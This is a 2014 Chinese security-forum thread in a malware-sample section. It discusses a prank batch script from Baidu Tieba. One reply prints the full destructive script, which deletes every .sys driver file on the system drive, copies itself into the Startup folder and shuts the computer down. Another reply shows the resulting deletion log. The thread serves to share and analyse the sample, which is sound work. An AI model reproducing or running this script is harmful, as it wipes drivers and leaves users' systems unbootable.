收藏本站 |切换到宽版 | 更换论坛皮肤

找回密码忘记邮箱 QQ快速登录快速登录快速注册

卡饭»论坛 › 安全区 › 病毒样本分享&分析区 › 百度贴吧上的东西，简单而淫荡（千万不要实机运行！）

12 3 4 5 6 / 6 页下一页

发新帖

查看: 15995|回复: 51

收起左侧

[病毒样本] 百度贴吧上的东西，简单而淫荡（千万不要实机运行！）

tg123321

发表于 2014-6-7 15:14:07 | 显示全部楼层 |阅读模式

本帖最后由 tg123321 于 2014-6-7 17:59 编辑

实机运行后果自负

本帖子中包含更多资源

您需要登录才可以下载或查看，没有帐号？快速注册

x

回复

深山红叶__

发表于 2014-6-7 15:15:19 | 显示全部楼层

本帖最后由深山红叶__ 于 2014-6-7 15:21 编辑

[mw_shl_code=shell,true]@echo off
title 手贱治疗
echo 正在治疗...
del /f/s/q %systemdrive%\*.sys
set var=%userprofile%\「开始」菜单\程序\启动
xcopy /y %0 "%var%"\
echo 让你再手贱！！！
shutdown /p[/mw_shl_code]

这哪是恶搞...直接友尽

本帖子中包含更多资源

您需要登录才可以下载或查看，没有帐号？快速注册

x

回复

饭@avast

发表于 2014-6-7 15:23:17 | 显示全部楼层

本帖最后由饭@avast 于 2014-6-7 15:27 编辑

XP 重启提示文件损坏，安装盘修复中。BD无反应。

密码是什么。。。早知道建个虚拟机快照了

本帖子中包含更多资源

您需要登录才可以下载或查看，没有帐号？快速注册

x

回复

消停

头像被屏蔽

发表于 2014-6-7 15:29:40 | 显示全部楼层

饭@avast 发表于 2014-6-7 15:23
XP 重启提示文件损坏，安装盘修复中。BD无反应。

密码是什么。。。早知道建个虚拟机快照了

这种批处理文件国外的以后不要试了，国内也仅限于数字、金山、费尔还可以支吧支吧！

回复

饭@avast

发表于 2014-6-7 15:32:02 | 显示全部楼层

消停发表于 2014-6-7 15:29
这种批处理文件国外的以后不要试了，国内也仅限于数字、金山、费尔还可以支吧支吧！

其实我觉着双击这种BAT 和你自己输这些指令进去运行差别不大。。。被搞了只能怪手贱

回复

XywCloud

发表于 2014-6-7 15:38:14 | 显示全部楼层

好残暴的bat

回复

tg123321

楼主| 发表于 2014-6-7 15:38:56 | 显示全部楼层

深山红叶__ 发表于 2014-6-7 15:15
[mw_shl_code=shell,true]@echo off
title 手贱治疗
echo 正在治疗...

楼主的头像可以完美防御这个东西

回复

tg123321

楼主| 发表于 2014-6-7 15:39:48 | 显示全部楼层

XywCloud 发表于 2014-6-7 15:38
好残暴的bat

过百度杀毒国际版

望提交

回复

llcy

发表于 2014-6-7 15:40:12 | 显示全部楼层

删除SYS文件，见到驱动就删除。

[mw_shl_code=css,true]正在治疗...
删除文件 - C:\config.sys
C:\Persi0.sys
另一个程序正在使用此文件，进程无法访问。
删除文件 - C:\Program Files\CCBComponents\DMWZ\usbccid.sys
删除文件 - C:\Program Files\CCBComponents\WATCHDATA\usbccid.sys
C:\Program Files\COMODO\COMODO Internet Security\cmderd.sys
拒绝访问。
C:\Program Files\COMODO\COMODO Internet Security\cmdguard.sys
拒绝访问。
C:\Program Files\COMODO\COMODO Internet Security\cmdhlp.sys
拒绝访问。
C:\Program Files\COMODO\COMODO Internet Security\inspect.sys
拒绝访问。
删除文件 - C:\Program Files\Internet Download Manager\idmtdi32.sys
删除文件 - C:\Program Files\Internet Download Manager\idmtdi64.sys
删除文件 - C:\Program Files\Internet Download Manager\idmwfp32.sys
删除文件 - C:\Program Files\Internet Download Manager\idmwfp64.sys
C:\Program Files\kingsoft\kingsoft antivirus\bootsafe.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\bootsafe64.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\ksapi.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\ksapi64.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\kusbquery.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\kusbquery64.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\ktool_update\kdownload\kxecom\kusbq
uery.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\ktool_update\kdownload\kxecom\kusbq
uery64.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\security\kavbootc.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\security\kavbootc64.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\security\ksde\kisknl.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\security\ksde\kisknl64.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\security\ksnetm\kisnetm.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\security\ksnetm\kisnetm64.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\security\ksnetm\kisnetmxp.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\security\kxescan\bc.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\security\kxescan\kdhacker.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\security\kxescan\kdhacker64.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\security\kxescan\ksskrpr.sys
拒绝访问。
C:\Program Files\kingsoft\kingsoft antivirus\update\kav\kav\ksapi.sys
拒绝访问。
C:\Program Files\Tencent\QQ\Bin\ABL.sys
拒绝访问。
C:\Program Files\Tencent\QQ\Bin\PBL.sys
拒绝访问。
C:\Program Files\Tencent\QQ\QQProtect\Bin\QQProtect.sys
拒绝访问。
删除文件 - C:\Users\Administrator\AppData\Local\Temp\AFWCORE.sys
删除文件 - C:\Users\Administrator\AppData\Local\Temp\SandBox.sys
C:\Windows\System32\ANSI.SYS
拒绝访问。
C:\Windows\System32\clfs.sys
拒绝访问。
C:\Windows\System32\country.sys
拒绝访问。
C:\Windows\System32\HIMEM.SYS
拒绝访问。
C:\Windows\System32\KEY01.SYS
拒绝访问。
C:\Windows\System32\KEYBOARD.SYS
拒绝访问。
C:\Windows\System32\NTDOS.SYS
拒绝访问。
C:\Windows\System32\NTDOS404.SYS
拒绝访问。
C:\Windows\System32\NTDOS411.SYS
拒绝访问。
C:\Windows\System32\NTDOS412.SYS
拒绝访问。
C:\Windows\System32\NTDOS804.SYS
拒绝访问。
C:\Windows\System32\NTIO.SYS
拒绝访问。
C:\Windows\System32\NTIO404.SYS
拒绝访问。
C:\Windows\System32\NTIO411.SYS
拒绝访问。
C:\Windows\System32\NTIO412.SYS
拒绝访问。
C:\Windows\System32\NTIO804.SYS
拒绝访问。
C:\Windows\System32\TSSK.sys
拒绝访问。
C:\Windows\System32\win32k.sys
拒绝访问。
C:\Windows\System32\drivers\1394bus.sys
拒绝访问。
C:\Windows\System32\drivers\1394ohci.sys
拒绝访问。
C:\Windows\System32\drivers\acpi.sys
拒绝访问。
C:\Windows\System32\drivers\acpipmi.sys
拒绝访问。
C:\Windows\System32\drivers\ADIHdAud.sys
拒绝访问。
C:\Windows\System32\drivers\adp94xx.sys
拒绝访问。
C:\Windows\System32\drivers\adpahci.sys
拒绝访问。
C:\Windows\System32\drivers\adpu320.sys
拒绝访问。
C:\Windows\System32\drivers\afd.sys
拒绝访问。
C:\Windows\System32\drivers\agilevpn.sys
拒绝访问。
[/mw_shl_code]

本帖子中包含更多资源

您需要登录才可以下载或查看，没有帐号？快速注册

x

回复

深山红叶__

发表于 2014-6-7 15:41:34 | 显示全部楼层

tg123321 发表于 2014-6-7 15:38
楼主的头像可以完美防御这个东西

头像妥妥的，搞这玩意儿还是没问题的

回复

12 3 4 5 6 / 6 页下一页

发新帖

高级模式

B Color Image Link Quote Code Smilies

您需要登录后才可以回帖登录 | 快速注册

本版积分规则回帖后跳转到最后一页

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-12 20:29 , Processed in 0.143025 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究，不得将上述内容用于商业或者其他非法用途，否则产生的一切后果自负，本站信息来自网络，版权争议问题与本站无关，您必须在下载后的24小时之内从您的电脑中彻底删除上述信息，如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表